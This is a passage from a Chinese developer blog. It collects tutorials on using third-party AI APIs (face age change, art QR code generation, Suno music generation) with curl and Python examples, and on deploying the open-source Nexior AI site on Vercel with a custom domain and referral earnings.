  "image_url": "https://faceeffect-1254418846.cos.ap-guangzhou.myqcloud.com/ft/ChangeAgePic/1256437459/bfce1ab8-5fd7-464d-8878-b38433f84d0e"
}

可以看到，这里返回的结果中有一个 image_url 字段，就是根据输入年龄变化后的人脸图片。其中变化后人脸信息如下所示：

可以看到图片中人脸是根据输入的年龄发生了变化。

另外如果想生成对应的对接代码，可以直接复制生成，例如 CURL 的代码如下：

curl -X POST 'https://api.acedata.cloud/face/change-age' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "age_infos": [{"age":60}],
  "image_url": "https://cdn.acedata.cloud/f5687u.png"
}'

Python 的对接代码如下：

import requests

url = "https://api.acedata.cloud/face/change-age"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "age_infos": [{"age":60}],
    "image_url": "https://cdn.acedata.cloud/f5687u.png"
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

错误处理

在调用 API 时，如果遇到错误，API 会返回相应的错误代码和信息。例如：

400 token_mismatched：Bad request, possibly due to missing or invalid parameters.
400 api_not_implemented：Bad request, possibly due to missing or invalid parameters.
401 invalid_token：Unauthorized, invalid or missing authorization token.
429 too_many_requests：Too many requests, you have exceeded the rate limit.
500 api_error：Internal server error, something went wrong on the server.

错误响应示例

{
  "success": false,
  "error": {
    "code": "api_error",
    "message": "fetch failed"
  },
  "trace_id": "2cf86e86-22a4-46e1-ac2f-032c0f2a4e89"
}

结论

通过本文档，您已经了解了如何使用人脸年龄变化 API 对输入的图片和年龄信息来进行人脸年龄变化。希望本文档能帮助您更好地对接和使用该 API。如有任何问题，请随时联系我们的技术支持团队。

作者崔庆才发表于 2024-12-15 阅读次数：本文字数： 2.2k 阅读时长 ≈ 2 分钟

艺术二维码 二维码耍出新花样，充满创意艺术

艺术二维码是一种创新的技术产品，它将二维码与美观的背景图像相结合，创造出既实用又美观的作品。它们不仅具有传统二维码的功能性，能被智能设备快速扫描识别，还加入了艺术元素，增强了视觉吸引力和品牌识别度。其中，部分艺术二维码甚至由人工智能生成，充分利用了现代技术，展示出无与伦比的创新和独特性。这使得艺术二维码在品牌营销、广告推广等领域有着广泛的应用。

简单来说，艺术二维码是扫描二维码与艺术美感的完美结合，它不仅提供了信息传递的功能，同时也能提升用户的视觉体验，使得每一次的扫描都充满艺术的享受。

作品概览

我们先来看几个二维码作品：

怎么样？这些二维码就是艺术二维码，它实现了图片和二维码的完美结合，比普通的二维码更加具有艺术感。而且关键是，每一个二维码都能扫描！

怎样制作？

想制作这样的二维码吗？怎么来制作这样的艺术二维码呢？

其实这个从技术来讲是相对复杂的。在现在这个 AI 时代，目前艺术二维码的解决方案是基于 Stable Diffusion 来做的，通过输入 prompt 我们可以生成对应的图片，同时结合一些二维码内容的融合最终实现这样的效果。

所以这里面其实最主要的挑战在于：如何既把二维码做得好看而且富有艺术，而且二维码还能被正确扫描。说实话这个技术其实还是蛮难的，需要大量的参数调整才能做到稍微好点的效果。

应该 99% 的人在第一步就放弃了。

假设通过不断的调整，我们真的做出来了这样的效果，真正运行起来也是一个不小的开销，如果要速度比较快的话，可能得性能比较好的 GPU，可能一不小心就上万块钱了。

有朋友可能会说：我不想费那么多精力，我也不想花那么多钱，我就想做个艺术二维码，或者我想把这个能力集成到我的产品里面，要是有这样现成的 API 就好了。

有吗？还真有。

本平台提供了艺术二维码相关生成 API，我们可以调用 API 输入各种参数，比如图片内容、二维码链接、样式风格等等各种参数，就可以非常方便地生成想要的艺术二维码了，而且首次申请免费赠送 20 张绘制次数。

申请 API

要使用艺术二维码 API，首先可以到艺术二维码 API 页面点击「获取」按钮：

如果你尚未登录，会自动跳转到登录页面，扫码关注公众号即可自动登录，无需额外注册步骤。

登录完了之后会跳回原页面，此时会提示「您尚未申请该服务，需要申请」。申请时会校验实名认证情况，请按照网站提示完成实名认证。实名认证会校验姓名、手机号、身份证号，认证完了之后可以返回页面，刷新一下页面确保信息更新，然后重新申请即可通过申请。

基本使用

要使用艺术二维码的最基本的功能，需要填入如下几个必须参数：

type：二维码的类型，如纯文本、链接等。
content：二维码的内容，比如如果是链接的话，我们可以填入对应的链接。
prompt：二维码对应的风格绘制指令，强烈建议用英文。比如说 pizza 则会绘制一个像披萨的二维码。

接下来，我们来生成一个知数云官网的二维码，类型是链接，内容是 https://data.zhishuyun.com，prompt 这里填写如下内容：

(best quality, masterpiece:1.2), underwater, ((pirate ship)), close up, zoom in, absurdes, big waves, twister, water falling, tentacles, ((glowing lights)), ((lighting storm)), fog, smoke, 4k res, 8k, higly detailed textures, cinematic shot, intricate details, side view

在测试页面填写如下内容：

然后点击测试：

过一会就发现艺术二维码就生成了，结果类似如下：

{
  "task_id": "a7e8831c-203d-447e-83fc-71783c766446",
  "image_url": "https://qrart.cdn.zhishuyun.com/attachments/1132182283529494652/1136344944630563006/Germey_2023-08-02__64ca8da51e5834b500e077bf.png",
  "image_width": 768,
  "image_height": 768
}

二维码如下：

这样我们就生成了一个二维码，主体是一个船只，悬挂着几个旗帜，而这些旗帜恰恰构成了二维码的定位点。

用手机扫描一下，就可以跳转到知数云的官网了。

同时上述内容调用方案我们可以非常方便地转成 API 调用。

prompt 指南

通过上述操作可以看到，艺术二维码关键在于 prompt 的编写，那 prompt 的编写都有什么讲究呢？

其实这个都是通用的 Stable Diffusion 的 prompt 指令，艺术二维码就是基于 Stable Diffusion 技术加上一些特殊调优生成的，所以它的输入 prompt 和 Stable Diffusion 是完全一样的。

如果你还不知道什么是 Stable Diffusion，可以到它的官网了解下：https://stablediffusionweb.com/，还有prompt 教程和指南：https://stable-diffusion-art.com/prompt-guide/，另外 Stable Diffusion 还制作了 prompt 生成器，可以帮助我们生成 prompt：https://stablediffusionweb.com/prompt-generator，除此之外还有一些 prompt 样例集合网站：https://publicprompts.art/

如上内容仅作参考，如果更多，可以自行搜索 Stable Diffusion 相关的资料进行学习。

高级参数

本 API 还提供了更多高级参数方便进行更多功能定制，说明如下：

preset：预设背景风格。二维码背景的风格，如超现实风格、霓虹效果、手绘风格等。
steps：绘制迭代次数。当次数越大，绘制的二维码艺术风格越强，范围为 10-20，默认是 16。
qrw：二维码的权重。当权重越大，图片越接近真实二维码，但是艺术化的风格会减弱，取值范围是 1.5-3，默认是 1.5。
seed：随机种子。用于生成随机二维码，当种子相同时，生成的二维码风格是一样的，范围为 1-9007199254740991。
rawurl：是否保持原始链接。默认情况下会将输入链接缩短为短链接，可以提高扫码率，该值默认为 false。
padding_level：二维码内边距。二维码内边距的大小，
aspect_ratio：二维码宽高比。
position：二维码位置。
pixel_style：二维码像素风格。
marker_shape：二维码定位框形状。
sub_marker：二维码子标记样式。
rotate：二维码旋转角度。
ecl：二维码纠错等级。
padding_noise：二维码内边距噪点。
pattern：预设二维码组合。预设二维码风格组合，如定位框的样式（方形、圆形等）、点的样式（方形、圆形等）。

下文我们来详细了解下艺术二维码 API 的一些高级参数，选取其中一些进行介绍。

预设 preset

艺术二维码 API 设置了很多预设模板，这个参数叫做 preset，取值如下：

sunset（日落）: 融合了夕阳余晖的温暖色调和柔和光线效果。
floral（花卉）: 带有花朵和植物元素的艺术风格，强调自然之美。
snowflakes（雪花）: 冰雪世界，具有冰晶和雪花的冷酷氛围。
feathers（羽毛）: 呈现出羽毛和鸟类特征，营造轻盈和柔软的感觉。
raindrops（雨滴）: 以雨滴和水珠为灵感，创造出清新湿润的效果。
ultra-realism（超现实）: 极度逼真的细节和质感，营造出超越现实的效果。
epic-realms（史诗领域）: 壮丽的场景和史诗感，带来宏大的视觉体验。
intricate-studio（错综复杂）: 富有细节和复杂性，需要仔细观察才能完全理解的风格。
symmetric-masterpiece（对称杰作）: 通过对称元素创造出精美的平衡和谐。
luminous-highway（发光高速公路）: 强调夜间的发光效果，如车灯和霓虹灯。
celestial-journey（星际之旅）: 探索宇宙和星际的奇幻旅程。
neon-mech（霓虹机械）: 结合了霓虹灯和机械元素，营造出未来感。
ethereal-low-poly（飘渺低多边形）: 低多边形风格，创造出虚幻和抽象的效果。
golden-vista（金色景观）: 以金色调为主，呈现出壮观的视觉景象。
cinematic-expanse（电影式广袤）: 带有电影感的广阔场景，引人入胜。
cinematic-warm（电影式温暖）: 具有电影质感的温暖色调和光线效果。
desolate-wilderness（荒凉荒野）: 描绘荒芜和荒野，营造出孤寂感。
vibrant-palette（鲜明调色板）: 色彩丰富多样，强烈的色彩对比。
enigmatic-journey（神秘之旅）: 探索充满谜团和神秘感的旅程。
timeless-cinematic（永恒电影）: 具有电影质感且不受时间限制的风格。
regal-galaxy（皇家星系）: 带有皇家气息的星系和宇宙元素。
illustrious-canvas（杰出画布）: 创作出卓越而引人注目的画布效果。
expressive-mural（富有表现力的壁画）: 充满表现力和情感的大型壁画风格。
serene-haze（宁静薄雾）: 带有宁静和薄雾效果，营造出宁静的氛围。

我们下面来尝试下不同参数的效果，比如拿 sunset（日落）和 raindrops（雨滴）为例来看下效果。

curl -X POST "https://api.zhishuyun.com/qrart/generate?token={token}" \
  -H "accept: application/json" \
  -H "content-type: application/json" \
  -d '{
    "type": "link",
    "content": "https://data.zhishuyun.com",
    "prompt": "sakura",
    "preset": "sunset"
  }'

这里我们把 preset 设置为了 sunset（日落效果），效果如下：

如果我们换个风格，比如把 preset 参数换成 raindrops（雨滴效果），效果如下：

关于其他的一些设定大家可以自行试验。

二维码宽高比 aspect_ratio

通过 aspect_ratio 参数我们可以设置二维码的宽高比，比如正方形 1:1，长方形 16:9 等等，该参数：

768x768：宽高比为 1:1，表示画布的宽度和高度相等。对应的像素尺寸为 768x768，生成的二维码画布为正方形。
1008x576：宽高比为 16:9，表示画布的宽度是高度的 16/9 倍。对应的像素尺寸为 1008x576，生成的二维码画布宽度较大，适合宽屏显示。
576x1008：宽高比为 9:16，表示画布的宽度是高度的 9/16 倍。对应的像素尺寸为 576x1008，生成的二维码画布高度较大，适合竖屏显示。
864x672：宽高比为 4:3，表示画布的宽度是高度的 4/3 倍。对应的像素尺寸为 864x672，生成的二维码画布略带正方形感，适合一般显示。
672x864：宽高比为 3:4，表示画布的宽度是高度的 3/4 倍。对应的像素尺寸为 672x864，生成的二维码画布略带纵向矩形感，适合一般显示。

curl -X POST "https://api.zhishuyun.com/qrart/generate?token={token}" \
  -H "accept: application/json" \
  -H "content-type: application/json" \
  -d '{
    "type": "link",
    "content": "https://data.zhishuyun.com",
    "prompt": "Fish",
    "aspect_ratio": "576x1008"
  }'

这里我们尝试生成了一个长方形的二维码，效果如下：

二维码位置 position

我们还可以通过 position 参数控制二维码的位置，比如说一张图片里面有一个女生穿裙子，而我们想要把二维码放在裙子的位置并与之融合起来，我们就可以尝试改下二维码的位置，调用样例如下：

curl -X POST "https://api.zhishuyun.com/qrart/generate?token={token}" \
  -H "accept: application/json" \
  -H "content-type: application/json" \
  -d '{
    "type": "link",
    "content": "https://data.zhishuyun.com",
    "prompt": "one of the beautiful girls in the moonlight in the background, in the style of pixelated chaos, rococo-inspired art, dark white and sky-blue, made of plastic, delicate flowers, gongbi, wimmelbilder",
    "position": "bottom",
    "aspect_ratio": "576x1008"
  }'

效果如下：

二维码像素风格 pixel_style

我们还可以自定义二维码的像素风格，通过传入 pixel_style 即可，参数可选值如下：

square（方形）：使用方形的像素单元，每个像素单元都是正方形的形状。
rounded（圆角）：像素单元具有圆角，使得生成的二维码看起来更加柔和和现代化。
dot（点状）：使用小圆点作为像素单元，生成的二维码呈现出点阵的效果，类似于印刷效果。
squircle（圆角方形）：类似于圆角矩形，但更加接近圆形的形状，为生成的二维码赋予一种独特的风格。
row（行排列）：将像素单元按行排列，呈现出水平方向的图案。
column（列排列）：将像素单元按列排列，呈现出垂直方向的图案。

样式预览如下：

二维码框风格 marker_shape

通过 marker_shape 可以自定义定位框的风格，参数可选值如下：

square（方形）：标记形状为正方形，用于突出特定位置或元素。
circle（圆形）：标记形状为圆形，可用于标记关键区域或元素。
plus（加号）：标记形状为加号，类似十字型，用于突出注意或特定信息。
box（方框）：标记形状为方框，类似于描边的矩形，可用于围绕区域或元素。
octagon（八边形）：标记形状为八边形，带有独特的角落，用于视觉吸引。
random（随机）：标记形状随机分布，为二维码添加艺术感和视觉趣味。
tiny-plus（微小加号）：微小的加号标记，可用于标记细微的元素或细节。

样式预览如下：

二维码子标记风格 sub_marker

通过 sub_marker 可以用于子标记（较小的标记）的形状，参数可选值如下：

square（方形）：子标记的形状为正方形，可以用于突出特定位置的细节。
circle（圆形）：子标记的形状为圆形，可用于强调关键细节或元素。
box（方框）：子标记的形状为方框，类似于描边的矩形，适用于标记细小区域。
random（随机）：子标记的形状随机分布，为二维码添加艺术感和视觉趣味。
plus（加号）：子标记的形状为加号，类似十字型，可以用于标记细微的信息或元素。

二维码旋转角度 rotate

通过 rotate 可以控制二维码的旋转角度，参数可选值如下：

0：不进行旋转，生成的二维码保持原始方向，没有旋转效果。
90：将生成的二维码顺时针旋转90度，使其以纵向方向显示。
180：将生成的二维码旋转180度，使其倒置，即上下颠倒的显示方式。
270：将生成的二维码顺时针旋转270度，使其以逆纵向方向显示。

二维码预设 pattern

通过 pattern 可以方便地启用一些二维码样式风格，比如方形的定位框、圆形的像素点等等，这里预定义了一些 pattern：

pattern	含义
s1	pixel_style: square marker_shape: square
s2	pixel_style: square marker_shape: square rotate: 180
s3	pixel_style: square marker_shape: square rotate: 180custom_padding_noise: 0.25
rd1	pixel_style: rounded marker_shape: random
rd2	pixel_style: rounded marker_shape: random rotate: 180
rd3	pixel_style: rounded marker_shape: random rotate: 180custom_padding_noise: 0.25
d1	pixel_style: dot marker_shape: circle
d2	pixel_style: dot marker_shape: circle rotate: 180
d3	pixel_style: dot marker_shape: circle rotate: 180custom_padding_noise: 0.25
r1	pixel_style: row marker_shape: plus
r2	pixel_style: row marker_shape: plus rotate: 180
r3	pixel_style: row marker_shape: plus rotate: 180custom_padding_noise: 0.25
c1	pixel_style: column marker_shape: box
c2	pixel_style: column marker_shape: box rotate: 180
c3	pixel_style: column marker_shape: box rotate: 180custom_padding_noise: 0.25
sq1	pixel_style: squircle marker_shape: random
sq2	pixel_style: squircle marker_shape: random rotate: 180
sq3	pixel_style: squircle marker_shape: random rotate: 180custom_padding_noise: 0.25

作者崔庆才发表于 2024-12-12 阅读次数：本文字数： 7.6k 阅读时长 ≈ 7 分钟

Nexior 利用 Vercel 快速搭建 Nexior AI 平台

Nexior 是 GitHub 上的一个开源项目，利用它我们可以一键部署自己的 AI 应用站点，包括 AI 问答、Midjourney 绘画、知识库问答、艺术二维码等应用，无需自己开发 AI 系统、无需采购 AI 账号、无需关心 API 支持、无需配置支付系统，零启动成本，无风险通过 AI 赚取收益。

本文章会介绍 Nexior 项目在 Vercel 上的部署流程，无需任何编程技巧即可几分钟部署一套属于自己的 AI 站点，并轻松利用该站点获取收益。

准备

首先打开 Nexior 的 GitHub 仓库，地址为：https://github.com/AceDataCloud/Nexior，然后注册或登录 GitHub 账号，点击 Fork，克隆一份代码到自己的本地仓库，如图所示：

Fork 完毕之后，我们便可以得到如下自己的个人仓库，如下：

这里的示例账号是 Germey，所以可以看到这里我们就 Fork 到了 Germey 这个用户下，同时有一个 forked from AceDataCloud/Nexior 的字样，这样准备工作就完成了。

Vercel 部署

Vercel 是一个可以帮助快速部署项目网站的平台，我们可以利用它直接和 GitHub 仓库对接，然后把 GitHub 仓库的源代码快速部署到线上，下面介绍下 Vercel 部署 Nexior 项目的流程。

打开 https://vercel.com/，使用 GitHub 登录。

我们便会看到类似如下的页面，这时候点击 Import 按钮，如图所示：

此时，Vercel 便展示了你的 GitHub 仓库，选择刚才 Fork 的 Nexior 仓库即可，如图所示：

找到 Nexior 仓库之后，点击 Import 按钮导入。

接着便会弹出一个配置页面，完全保持默认配置，点击 Deploy 按钮，如图所示：

点击 Deploy 之后，Vercel 便开始构建整个项目并进行部署，我们不需要做任何操作，只需等待 1-2 分钟左右即可，如图所示：

部署完毕之后，Vercel 便会弹出一个页面恭喜你的部署已经完成，此时你就成功把 Nexior 项目部署到你的线上环境了，如图所示：

点击 Continue to Dashboard，我们便可以看到 Vercel 为我们生成的预览域名，如图所示：

此时直接打开这个链接，比如这里的样例地址是 https://nexior-germeys-projects.vercel.app/，打开之后，我们便可以看到 Nexior 项目的运行情况了。

打开之后注册登录一下，比如用邮箱、GitHub 登录都是可以的，登录完毕之后便可以看到一个配置页面，比如 Site Configuration，我们可以自行修改该站点的标题、Logo、Favicon、管理员等信息，如下图所示：

同时还有一个比较重要的部分就是分销推广的配置，如图所示：

这里我们可以修改两个信息，一个叫默认邀请人 ID、一个叫强制邀请人 ID，说明如下：

默认邀请人 ID：如果只设置了默认邀请人 ID，那么人人都可以分销和推广该站点，谁邀请的客户，客户的消费返利都会给到邀请人。如果站点的 URL 不携带任何推广信息的时候（URL 里面没有 inviter_id）的时候，注册用户默认情况下都会绑定到这个默认邀请人 ID 上。初始状态下这个 ID 就是站长的个人 ID。
强制邀请人 ID：如果设置了强制邀请人 ID，那么除了这个强制邀请人，其他人都无法从该站点获得分销返利，后台也看不到分销推广的入口。该站点所有注册用户都会被绑定到这个强制邀请人上面，所有的消费返利都是强制邀请人的。

所以，对于以上两个模式，取决于站长的推广思路，视情况而定。

另外还有一个配置选项就是功能开关，如图所示：

目前 Nexior 提供了多个功能，站长可以选择性地打开或关闭某些特定功能。

自定义域名

现在我们已经成功部署了一个网站，但是域名是 Vercel 为我们分配的二级域名，其实并不利于对外推广，如果能够修改为我们的自定义域名的话就会好很多。

比如说我这边有一个 https://chictem.com 的域名，下面介绍下自定义域名的配置。

如果没有域名，可以到各大域名厂商注册，例如 namecheap、Godaddy 等，一些中国境内服务商也可以。

接下来我们打开 Vercel 的自定义域名配置页面：

此处输入你想要配置的自定义域名，比如这里示例配置为 https://chictem.com，就直接填写 chictem.com，不带 https:// 前缀，点击 Add：

接下来 Vercel 提示要选择域名配置的选项，推荐我们也添加一个 www 开头的域名，这个可加可不加，添加了之后就可以 www 开头的域名也能访问到此网站。这里我们直接选择最后一项直接添加根域名：

确定之后我们就发现这里提示有一个待配置的 DNS：

这里让我们添加一个 A 记录，解析到 76.76.21.21，我们这时候需要转到域名服务商这里配置下 DNS。

注意：域名服务商取决于你在哪个网站域名买的域名，通常来说你在哪个网站买的域名，网站后台就有配置 DNS 的入口。

下面是一个 DNS 后台配置样例：

配置完毕之后，我们就能用自定义域名访问刚配置的网站了，如图所示：

注意：配置了新域名之后，注意我们需要进入到站点配置页面重新配置下站点标题、Logo 等选项，因为这个配置是跟域名绑定的，启用了新域名之后需要新配置站点。

代码更新

因为 Nexior 的源代码是在持续更新的，可能不断有新的功能或者 Bug 修复，代码会直接同步到源代码仓库 https://github.com/AceDataCloud/Nexior 这里。

那我们部署的站点如果想同步更新最新代码，应该怎么做呢？

其实很简单，回到 GitHub 里面我们 Fork 的代码仓库，这里可以看到我们原本 Fork 的代码仓库已经落后于官方 Nexior 源代码几个版本了，我们可以直接点击 Sync fork 按钮，然后点击 Update branch 就可以了：

点击之后，我们 fork 的仓库的代码就会更新，代码更新之后，Vercel 这边的网站也会自动更新，稍等片刻重新刷新网页就发现网站更新了。

赚取收益

现在我们已经有了自定义域名，配置好如上内容之后，就可以把这个站点分享出去赚钱啦！

所有的用户只要有付费账单，其中有一部分便会转化为收益到达分销者的账户，到时候添加客服提现即可。

进入分销界面，可以随时查看当前邀请人数、分销总金额、总奖励等，直接添加客服提现即可。

作者崔庆才发表于 2024-07-29 阅读次数：本文字数： 2.6k 阅读时长 ≈ 2 分钟

人工智能 Suno API 的申请及使用

随着 AI 的应用变广，各类 AI 程序已逐渐普及。AI 已逐渐深入到人们的工作生活方方面面。而 AI 涉及的行业也越来越多，从最初的写作，到医疗教育，再到现在的音乐。

Suno 是一个专业高质量的 AI 歌曲和音乐创作平台，用户只需输入简单的文本提示词，即可根据流派风格和歌词生成带有人声的歌曲。该 AI 音乐生成器由来自 Meta、TikTok、Kensho 等知名科技公司的团队成员开发，目标是不需要任何乐器工具，让所有人都可以创造美妙的音乐。

Suno 最新已将音乐生成模型升级到 V3 版本，可生成 2 分钟的歌曲。

然而 Suno 官方是并没有提供 API 的，AceDataCloud 提供了一套 Suno 的 API，模拟对接了 Suno 官方，可以方便快捷地生成想要的音乐。

申请和使用

要使用 Suno Audios API，首先可以到 Suno Audios Generation API 页面点击「Acquire」按钮，获取请求所需要的凭证：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

想些什么歌曲，可以任意输入一段文字，比如我想生成一个关于圣诞的歌曲，就可以输入 a song for Christmas，如图所示：

生成的代码如下：

可以点击「Try」按钮直接测试 API，稍等 1-2 分钟，结果如下：

{
  "success": true,
  "data": [
    {
      "id": "2f16f7bc-4135-42c6-b3c5-6d6c49dc8cd5",
      "title": "Winter Wonderland",
      "image_url": "https://cdn1.suno.ai/image_2f16f7bc-4135-42c6-b3c5-6d6c49dc8cd5.png",
      "lyric": "[Verse]\nSnowflakes falling all around\nGlistening white\nCovering the ground\nChildren laughing\nFull of delight\nIn this winter wonderland tonight\nSanta's sleigh\nUp in the sky\nRudolph's nose shining bright\nOh my\nHear the jingle bells\nRinging so clear\nBringing joy and holiday cheer\n[Verse 2]\nRoasting chestnuts by the fire's glow\nChristmas lights\nThey twinkle and show\nFamilies gathering with love and cheer\nSpreading warmth to everyone near",
      "audio_url": "https://cdn1.suno.ai/2f16f7bc-4135-42c6-b3c5-6d6c49dc8cd5.mp3",
      "video_url": "https://cdn1.suno.ai/2f16f7bc-4135-42c6-b3c5-6d6c49dc8cd5.mp4",
      "created_at": "2024-05-10T16:21:37.624Z",
      "model": "chirp-v3",
      "prompt": "A song for Christmas",
      "style": "holiday"
    },
    {
      "id": "5dca232b-17cc-4896-a2d1-4b59178bf410",
      "title": "Winter Wonderland",
      "image_url": "https://cdn1.suno.ai/image_5dca232b-17cc-4896-a2d1-4b59178bf410.png",
      "lyric": "[Verse]\nSnowflakes falling all around\nGlistening white\nCovering the ground\nChildren laughing\nFull of delight\nIn this winter wonderland tonight\nSanta's sleigh\nUp in the sky\nRudolph's nose shining bright\nOh my\nHear the jingle bells\nRinging so clear\nBringing joy and holiday cheer\n[Verse 2]\nRoasting chestnuts by the fire's glow\nChristmas lights\nThey twinkle and show\nFamilies gathering with love and cheer\nSpreading warmth to everyone near",
      "audio_url": "https://cdn1.suno.ai/5dca232b-17cc-4896-a2d1-4b59178bf410.mp3",
      "video_url": "https://cdn1.suno.ai/5dca232b-17cc-4896-a2d1-4b59178bf410.mp4",
      "created_at": "2024-05-10T16:21:37.624Z",
      "model": "chirp-v3",
      "prompt": "A song for Christmas",
      "style": "holiday"
    }
  ]
}

可以看到这时候我们就得到了两首歌的内容，包括标题、预览图、歌词、音频、视频等内容。

字段说明如下：

success：生成是否成功，如果成功则为 true，否则为 false
data：是一个列表，包含了生成的歌曲的详细信息。
- id：歌曲 ID
- title：歌曲的标题
- image_url：歌曲的封面图片
- lyric：歌曲的歌词
- audio_url：歌曲的音频文件，打开就是一个 mp3 音频。
- video_url：歌曲的视频文件，打开就是一个 mp4 视频。
- created_at：创建的时间
- model：使用的模型，一般是最新的 v3 模型
- style：风格

自定义生成

如果想自定义生成歌词，可以输入歌词：

这时候 lyric 字段可以传入类似如下内容：

[Verse]\nSnowflakes falling all around\nGlistening white\nCovering the ground\nChildren laughing\nFull of delight\nIn this winter wonderland tonight\nSanta's sleigh\nUp in the sky\nRudolph's nose shining bright\nOh my\nHear the jingle bells\nRinging so clear\nBringing joy and holiday cheer\n[Verse 2]\nRoasting chestnuts by the fire's glow\nChristmas lights\nThey twinkle and show\nFamilies gathering with love and cheer\nSpreading warmth to everyone near

注意，这里的歌词中 \n 是换行符，如果你不知道如何生成歌词，可以使用下文介绍的生成歌词的 API 自助生成。

接下来我们要根据歌词、标题、风格自定义生成歌曲，就可以指定如下内容：

lyric：歌词文本
custom：填写为 true，代表自定义生成，该参数默认为 false，代表使用 prompt 生成。
file：歌曲的标题。
style：歌曲的风格，选填。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/suno/audios' \
-H 'authorization: Bearer {token}' \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-d '{
"lyric": "[Verse]\\nSnowflakes falling all around\\nGlistening white\\nCovering the ground\\nChildren laughing\\nFull of delight\\nIn this winter wonderland tonight\\nSanta's sleigh\\nUp in the sky\\nRudolph's nose shining bright\\nOh my\\nHear the jingle bells\\nRinging so clear\\nBringing joy and holiday cheer\\n[Verse 2]\\nRoasting chestnuts by the fire's glow\\nChristmas lights\\nThey twinkle and show\\nFamilies gathering with love and cheer\\nSpreading warmth to everyone near",
"custom": true
}'

测试允许，生成的效果是类似的。

异步回调

由于 Suno 生成音乐的时间相对较长，大约需要 1-2 分钟，如果 API 长时间无响应，HTTP 请求会一直保持连接，导致额外的系统资源消耗，所以本 API 也提供了异步回调的支持。

整体流程是：客户端发起请求的时候，额外指定一个 callback_url 字段，客户端发起 API 请求之后，API 会立马返回一个结果，包含一个 task_id 的字段信息，代表当前的任务 ID。当任务完成之后，生成音乐的结果会通过 POST JSON 的形式发送到客户端指定的 callback_url，其中也包括了 task_id 字段，这样任务结果就可以通过 ID 关联起来了。

下面我们通过示例来了解下具体怎样操作。

首先，Webhook 回调是一个可以接收 HTTP 请求的服务，开发者应该替换为自己搭建的 HTTP 服务器的 URL。此处为了方便演示，使用一个公开的 Webhook 样例网站 https://webhook.site/，打开该网站即可得到一个 Webhook URL，如图所示：

将此 URL 复制下来，就可以作为 Webhook 来使用，此处的样例为 https://webhook.site/03e60575-3d96-4132-b681-b713d78116e2。

接下来，我们可以设置字段 callback_url 为上述 Webhook URL，同时填入 prompt，如图所示：

点击运行，可以发现会立即得到一个结果，如下：

1
2
3

{
  "task_id": "44472ab8-783b-4054-b861-5bf14e462f60"
}

稍等片刻，我们可以在 https://webhook.site/03e60575-3d96-4132-b681-b713d78116e2 上观察到生成歌曲的结果，如图所示：

内容如下：

{
  "success": true,
  "task_id": "44472ab8-783b-4054-b861-5bf14e462f60",
  "data": [
    {
      "id": "da4324e5-84b2-484b-b0e9-dd261381c594",
      "title": "Winter Whispers",
      "image_url": "https://cdn1.suno.ai/image_da4324e5-84b2-484b-b0e9-dd261381c594.png",
      "lyric": "[Verse]\nSnow falling gently from the sky\nChildren giggling as they pass by\nFire crackling\nCozy and warm\nChristmas spirit begins to swarm\n[Verse 2]\nTwinkling lights\nA sight to behold\nStockings hung\nWaiting to be filled with gold\nGifts wrapped with love\nPiled high\nExcitement in the air\nYou can't deny\n[Chorus]\nWinter whispers in the wind\nJoy and love it brings\nLet's celebrate this season\nWith the ones we're missing",
      "audio_url": "https://cdn1.suno.ai/da4324e5-84b2-484b-b0e9-dd261381c594.mp3",
      "video_url": "https://cdn1.suno.ai/da4324e5-84b2-484b-b0e9-dd261381c594.mp4",
      "created_at": "2024-05-11T07:33:05.430Z",
      "model": "chirp-v3",
      "prompt": "A song for Christmas",
      "style": "pop"
    },
    {
      "id": "b878a87b-a0db-4046-8ccd-ecd2fb3d4372",
      "title": "Winter Whispers",
      "image_url": "https://cdn1.suno.ai/image_b878a87b-a0db-4046-8ccd-ecd2fb3d4372.png",
      "lyric": "[Verse]\nSnow falling gently from the sky\nChildren giggling as they pass by\nFire crackling\nCozy and warm\nChristmas spirit begins to swarm\n[Verse 2]\nTwinkling lights\nA sight to behold\nStockings hung\nWaiting to be filled with gold\nGifts wrapped with love\nPiled high\nExcitement in the air\nYou can't deny\n[Chorus]\nWinter whispers in the wind\nJoy and love it brings\nLet's celebrate this season\nWith the ones we're missing",
      "audio_url": "https://cdn1.suno.ai/b878a87b-a0db-4046-8ccd-ecd2fb3d4372.mp3",
      "video_url": "https://cdn1.suno.ai/b878a87b-a0db-4046-8ccd-ecd2fb3d4372.mp4",
      "created_at": "2024-05-11T07:33:05.430Z",
      "model": "chirp-v3",
      "prompt": "A song for Christmas",
      "style": "pop"
    }
  ]
}

可以看到结果中有一个 task_id 字段，其他的字段都和上文类似，通过该字段即可实现任务的关联。

歌词生成

如果你想自定义生成歌曲，但又不太想自己编写歌词，可以使用 AceDataCloud 提供的歌词生成 API 来通过 prompt 生成歌词，API 是 Suno Lyrics Generation API。

该 API 只有一个输入参数，就是 prompt，填写样例如下：

这里我们输入的 prompt 是 A song about winter，生成和冬天相关的歌曲。

点击运行，结果如下：

{
  "success": true,
  "task_id": "57e8ce3a-39cb-41a2-802f-e70a324f4d0a",
  "data": {
    "text": "[Verse]\nSnowflakes falling from the sky\nWinter's cold touch\nOh how it gets me high\nI bundle up in layers\nOh so cozy\nStepping out and feeling the frost on my nose\nSee\n\n[Verse 2]\nThe world is covered in a blanket of white\nIcicles hanging\nShimmering so bright\nThe chilly air fills my lungs with every breath\nWalking in the snow\nLeaving footprints that won't be left\n\n[Chorus]\nOh\nWinter's cold touch\nIt's a season that I love so much\nSnowfall brings a feeling so divine\nWinter's cold touch\nIt's a magical time",
    "title": "Winter's Cold Touch",
    "status": "complete"
  }
}

可以看到，data 的 text 字段就是歌词信息，这个信息可以用于上文的自定义歌曲生成。

作者崔庆才发表于 2024-05-30 阅读次数：本文字数： 7.3k 阅读时长 ≈ 7 分钟

人工智能 如何用 AI 问答 API 彻底改变用户体验！

我们知道，市面上一些问答 API 的对接还是相对没那么容易的，比如说 OpenAI 的 Chat Completions API，它有一个 messages 字段，如果要完成连续对话，需要我们把所有的上下文历史全部传递，同时还需要处理 Token 超出限制的问题。

